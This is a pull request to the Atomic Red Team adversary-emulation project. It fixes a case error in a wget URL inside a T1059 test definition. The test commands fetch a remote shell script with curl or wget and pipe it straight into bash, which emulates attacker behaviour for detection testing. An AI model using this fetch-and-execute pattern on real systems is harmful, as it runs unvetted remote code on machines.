### PR TITLE
Fixing a typo in the wget URL for T1059

### DIFF
--- a/atomics/T1059/T1059.yaml
+++ b/atomics/T1059/T1059.yaml
@@ -16,4 +16,4 @@ atomic_tests:
     name: sh
     command: |
       bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
-      bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
+      bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"


### PR DESCRIPTION
**Details:**
The wget command tries to download the file from a URL that is not correct and the server response is `404 not found` instead of the bash script.  GitHub paths are case sensitive and the `echo-art-fish.sh` sits within the `atomics` path not `Atomics`.

**Testing:**
Run interactive test

**Associated Issues:**
None